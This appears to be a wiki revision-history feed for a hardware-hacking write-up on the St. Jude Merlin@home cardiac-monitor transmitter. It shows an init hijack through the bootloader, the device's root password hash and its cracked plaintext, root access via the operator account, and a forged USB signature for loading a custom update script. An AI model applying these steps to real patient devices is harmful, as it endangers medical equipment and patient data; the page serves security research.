https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&feed=atom&action=history
SJM Merlin at Home - Revision history
2024-03-29T14:13:00Z
Revision history for this page on the wiki
MediaWiki 1.37.2
https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2872&oldid=prev
Rjmendez at 19:21, 9 August 2017
2017-08-09T19:21:23Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 19:21, 9 August 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l356">Line 356:</td>
<td colspan="2" class="diff-lineno">Line 356:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>It looks like their pendrive "signature" is fairly easy to get around.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>It looks like their pendrive "signature" is fairly easy to get around.</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><pre>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><pre>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00116472 s, 2.6 kB/s</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00116472 s, 2.6 kB/s</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ hd /tmp/.sign </div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ hd /tmp/.sign </div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 00 00 00 |...|</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 00 00 00 |...|</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ hd .sign_mod</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ hd .sign_mod</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 53 4a 4d |SJM|</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 53 4a 4d |SJM|</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00700994 s, 0.4 kB/s</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00700994 s, 0.4 kB/s</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00123249 s, 2.4 kB/s</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00123249 s, 2.4 kB/s</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ hd /tmp/.sign </div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ hd /tmp/.sign </div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 53 4a 4d |SJM|</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 53 4a 4d |SJM|</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</pre></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</pre></div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l380">Line 380:</td>
<td colspan="2" class="diff-lineno">Line 380:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Adding the required files to the drive and a small script.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Adding the required files to the drive and a small script.</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><pre>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:/media/rjmendez/7A3B-B3C6$ ls -lahR</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><pre>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:/media/rjmendez/7A3B-B3C6$ ls -lahR</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>.:</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>.:</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>total 36K</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>total 36K</div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l401">Line 401:</td>
<td colspan="2" class="diff-lineno">Line 401:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh </div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh </div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>#!/bin/sh</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>#!/bin/sh</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>function led_off {</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>function led_off {</div></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2744:rev-2872 -->
</table>
Rjmendez
https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2744&oldid=prev
Zenofex: Zenofex moved page SJM merlin at home to SJM Merlin at Home
2017-08-05T06:36:46Z
<p>Zenofex moved page <a href="/index.php/SJM_merlin_at_home" class="mw-redirect" title="SJM merlin at home">SJM merlin at home</a> to <a href="/index.php/SJM_Merlin_at_Home" title="SJM Merlin at Home">SJM Merlin at Home</a></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 06:36, 5 August 2017</td>
</tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2702:rev-2744 -->
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2702&oldid=prev
Rjmendez at 01:48, 15 May 2017
2017-05-15T01:48:56Z
<p></p>
<a href="//www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2702&oldid=2701">Show changes</a>
Rjmendez
https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2701&oldid=prev
Rjmendez: SJM Merlin@home model EX1150
2017-05-14T19:20:57Z
<p>SJM Merlin@home model EX1150</p>
<p><b>New page</b></p><div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]<br />
[[Category:Medical]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.<br />
<br />
== About ==<br />
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.<br />
<br />
== Disassembly ==<br />
<gallery><br />
File:Merlin-front.jpg<br />
File:Merlin-back.jpg<br />
File:Merlin-side_usb.jpg<br />
File:Merlin-antenna1.jpg<br />
File:Merlin-antenna2.jpg<br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A Login Console is presented on UART (3.3v) at 115200 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) to a version of Montavista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to init hijack by interrupting the bootloader.<br />
<br />
<pre>Post device verification...<br />
Serial2In string: ATi0<br />
Serial2In string: <br />
56000<br />
Modem Post : Passed with retries = 0<br />
<br />
Time taken by POST : [1.197000] seconds<br />
nand_init: manuf=0x000000EC device=0x000000F1<br />
scanning for bad blocks...<br />
nand_check_blocks: nand_read_page() failed, addr=0x02B40000<br />
nand_check_blocks: nand_read_page() failed, addr=0x04B20000<br />
nand_check_blocks: nand_read_page() failed, addr=0x07660000<br />
<br />
Consider yourself BLOBed!<br />
<br />
blob version 2.0.5-pre2 for Tanto Basic Device<br />
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw<br />
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.<br />
This is free software, and you are welcome to redistribute it<br />
under certain conditions; read the GNU GPL for details.<br />
blob release: d20081014_platform_4_16<br />
Memory map:<br />
0x02000000 @ 0xc0000000 (32 MB)<br />
<br />
ram_post executing...<br />
Data Bus Test<br />
Address Bus Test<br />
Data Qualifer Test<br />
Device Test<br />
c0200000status_next, board type = RF board revision = (3)<br />
c1e00000r14_svc = 0x0000034d<br />
Autoboot in progress, press any key to stop ..<br />
Autoboot aborted<br />
Type "help" to get a list of commands<br />
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=<br />
</pre><br />
<br />
We can pull some useful information from the device.<br />
<br />
<pre>sh-2.05a# cat /etc/passwd<br />
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash<br />
bin:*:1:1:bin:/bin:<br />
daemon:*:2:2:daemon:/usr/sbin:<br />
sys:*:3:3:sys:/dev:<br />
adm:*:4:4:adm:/var/adm:<br />
lp:*:5:7:lp:/var/spool/lpd:<br />
sync:*:6:8:sync:/bin:/bin/sync<br />
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown<br />
halt:*:8:10:halt:/sbin:/sbin/halt<br />
mail:*:9:11:mail:/var/spool/mail:<br />
news:*:10:12:news:/var/spool/news:<br />
uucp:*:11:13:uucp:/var/spool/uucp:<br />
operator:*:12:0:operator:/root:<br />
games:*:13:100:games:/usr/games:<br />
ftp:*:15:14:ftp:/var/ftp:<br />
man:*:16:100:man:/var/cache/man:<br />
www:*:17:100:www:/var/www:<br />
sshd:*:18:100:sshd:/var/run/sshd:<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
sh-2.05a# cat /etc/shadow<br />
cat: /etc/shadow: No such file or directory</pre><br />
<br />
Lets break this.<br />
<br />
<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a<br />
hashcat (v3.5.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Precompute-Final-Permutation<br />
* Not-Iterated<br />
* Single-Hash<br />
* Single-Salt<br />
* Brute-Force<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
Watchdog: Temperature retain trigger set to 75c<br />
<br />
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><br />
<br />
0q8h1Maw1oYAU:mah1200<br />
<br />
Session..........: sjm_hash<br />
Status...........: Cracked<br />
Hash.Type........: descrypt, DES (Unix), Traditional DES<br />
Hash.Target......: 0q8h1Maw1oYAU<br />
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)<br />
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)<br />
Guess.Mask.......: ?a?a?a?a?a?a?a [7]<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)<br />
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts<br />
Progress.........: 4764729344/69833729609375 (0.01%)<br />
Rejected.........: 0/4764729344 (0.00%)<br />
Restore.Point....: 0/81450625 (0.00%)<br />
Candidates.#1....: ;~9anan -> $sb~{ka<br />
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16<br />
<br />
Started: Sun May 07 17:39:51 2017<br />
Stopped: Sun May 07 17:40:05 2017</pre><br />
<br />
Attempts to login as root fail, what was going on with that operator user?<br />
<br />
<pre>operator:*:12:0:operator:/root:</pre><br />
<br />
Lets set the password to "test" and attempt logging in.<br />
<br />
<pre>sh-2.05a# grep "operator" /etc/passwd<br />
operator:dPUvQFLH8...A:12:0:operator:/root:</pre><br />
<br />
<pre>[SJM_CONFIGURATION]<br />
VERSION=EX2000 v6.1B PR_6.56<br />
(none) login: root<br />
Password: <br />
Login incorrect<br />
2017-05-14 <br />
(none) login: operator<br />
Password: <br />
operator@(none):~$ whoami<br />
operator<br />
operator@(none):~$ su root<br />
Password: <br />
PAM_unix[266]: (su) session opened for user root by (uid=12)<br />
root@(none):~# whoami<br />
root<br />
root@(none):~# </pre><br />
<br />
== Taking Things Further ==<br />
<br />
Lets look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.<br />
<br />
<pre>#!/bin/bash<br />
#<br />
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke <br />
# this script only if the attached USB device is a mass-storage device.<br />
# hotplug does this by looking at the device class of the attached usb device<br />
# See /etc/hotplug/usb.usermap. The device class for mass storage devices<br />
# is ______<br />
# <br />
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to<br />
# find the scsi ID of the attached USB storage device. It then goes on to<br />
# find the device node corresponding to this scsi ID.<br />
# <br />
# version 1.1 - Added USB signature check functionality <br />
#<br />
# For the new cellular adapters - viz mobidata and velocity, ignore the<br />
# mass storage interface reported. Please see comments at the top of<br />
# /etc/hotplug/usb/velocity for details.<br />
#<br />
# - Ashok Iyer (16-Jun-2010)<br />
#<br />
<br />
export PATH=/usr/bin:/usr/local/bin:$PATH<br />
<br />
MOUNT_PATH="/mnt/sjmpendrives"<br />
MOUNT_NUMBER=1<br />
LOG_FILE="/tmp/usbstorage.log"<br />
SGMAP="sg_map"<br />
<br />
<br />
# The functions in this script rely on "echo" to pass information to each<br />
# other. If you need to modify this script, do not use "echo" for debugging.<br />
# Instead use the feedback()/error_exit() functions below. These will log <br />
# information to a log file and do not interfere with information passing <br />
# between functions.<br />
<br />
***snip***<br />
<br />
function check_sign {<br />
local node1=$1"1"<br />
feedback "Checking signature ... "<br />
feedback "node1 = $node1"<br />
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501<br />
